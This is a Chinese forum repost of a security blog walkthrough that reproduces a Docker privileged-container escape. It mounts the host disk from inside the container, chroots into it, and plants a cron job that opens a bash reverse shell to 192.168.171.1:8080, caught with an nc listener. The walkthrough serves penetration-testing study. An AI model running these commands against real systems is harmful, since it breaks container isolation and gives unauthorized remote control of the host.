登录
/
注册
首页
论坛
其它
首页
科技
业界
安全
程序
广播
Follow
关于
每日签到
每天签到奖励2圆-6圆
发帖说明
VIP申请
登录
/
注册
账号
自动登录
找回密码
密码
登录
立即注册
搜索
搜索
关闭
CSDN热搜
程序园
精品问答
技术交流
资源下载
本版
帖子
用户
软件
问答
教程
代码
写记录
写博客
VIP申请
VIP网盘
网盘
联系我们
每日签到
道具
勋章
任务
设置
我的收藏
退出
腾讯QQ
微信登录
返回列表
首页
›
业界区
›
科技
›
[docker逃逸] Privileged 特权模式逃逸复现
[docker逃逸] Privileged 特权模式逃逸复现
[ 复制链接 ]
颜清华
2025-6-9 16:00:49
本文作者CVE-柠檬i
CSDN:https://blog.csdn.net/weixin_49125123
博客园:https://www.cnblogs.com/CVE-Lemon
微信公众号:Lemon安全
简述
在 Docker 中,Privileged 特权模式赋予容器几乎与宿主机相同的权限,允许其访问所有设备和内核功能。这种模式虽然提供了灵活性,但也带来了安全风险,可能导致容器逃逸,即攻击者从容器内获取宿主机权限。
环境配置
以特权模式创建容器
docker pull centos
docker run -itd --privileged centos /bin/bash
复制代码
查看当前是否为docker环境:
cat /proc/1/cgroup|grep docker
复制代码
systemd-detect-virt 也可以判断当前是否为容器
systemd-detect-virt
复制代码
查看当前是否为特权模式
capsh --print
复制代码
cat /proc/self/status | grep CapEff
复制代码
CapEff为0000001fffffffff,当前容器为特权模式。
复现
使用lsblk查看磁盘
挂载宿主机根目录
mkdir test
mount /dev/sds3 test
复制代码
挂载成功
使用chroot切换根目录,方便进行计划任务反弹shell
chroot test
复制代码
创建计划任务
crontab -e
复制代码
*/1 * * * * /bin/bash -c "/bin/bash -i >& /dev/tcp/192.168.171.1/8080 0>&1"
复制代码
攻击机监听反弹shell,成功反弹了宿主机的shell
nc -lvvp 8080
复制代码
来源:程序园用户自行投稿发布,如果侵权,请联系站长删除
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
逃逸
docker
Privileged
特权
模式
相关帖子
ubuntu上Docker的安装、卸载及加速
夜莺监控的几种架构模式详解
基于 Docker 的 LLaMA-Factory 全流程部署指南
Docker Desktop里搭建Redis 8.2.1集群的保姆级教程
Docker Desktop里搭建RabbitMq 4.1.3集群的保姆级教程
Docker Desktop里搭建RabbitMq 4.1.3集群的保姆级教程
wazuh-docker的邮件告警配置
CentOS 8 安装Docker 报错requires container-selinux >= 2:2.x
KMP 模式串匹配算法讲解
设计模式之单例模式
vip免费申请,1年只需15美金$
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
相关推荐
安全
ubuntu上Docker的安装、卸载及加速
0
569
蓬森莉
2025-08-12
业界
夜莺监控的几种架构模式详解
0
213
阕阵闲
2025-08-14
业界
基于 Docker 的 LLaMA-Factory 全流程部署指南
0
138
劳怡月
2025-08-20
业界
Docker Desktop里搭建Redis 8.2.1集群的保姆级教程
0
903
羊夏菡
2025-08-22
业界
Docker Desktop里搭建RabbitMq 4.1.3集群的保姆级教程
0
70
宿遘稠
2025-08-23
业界
Docker Desktop里搭建RabbitMq 4.1.3集群的保姆级教程
0
960
金娅鸣
2025-08-23
安全
wazuh-docker的邮件告警配置
0
832
觐有
2025-08-26
业界
CentOS 8 安装Docker 报错requires container-selinux >= 2:2.x
0
364
恃液
2025-08-28
安全
KMP 模式串匹配算法讲解
0
313
赶塑坠
2025-09-02
安全
设计模式之单例模式
0
70
颖顿庐
2025-09-03
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
回复
本版积分规则
回帖并转播
回帖后跳转到最后一页
浏览过的版块
业界
安全
代码
签约作者
程序园优秀签约作者
发帖
颜清华
2025-6-9 16:00:49
关注
0
粉丝关注
17
主题发布
板块介绍填写区域,请于后台编辑
财富榜{圆}
敖可
9984
黎瑞芝
9990
杭环
9988
4
凶契帽
9988
5
氛疵
9988
6
猷咎
9986
7
里豳朝
9986
8
肿圬后
9986
9
蝓俟佐
9984
10
虽裘侪
9984
查看更多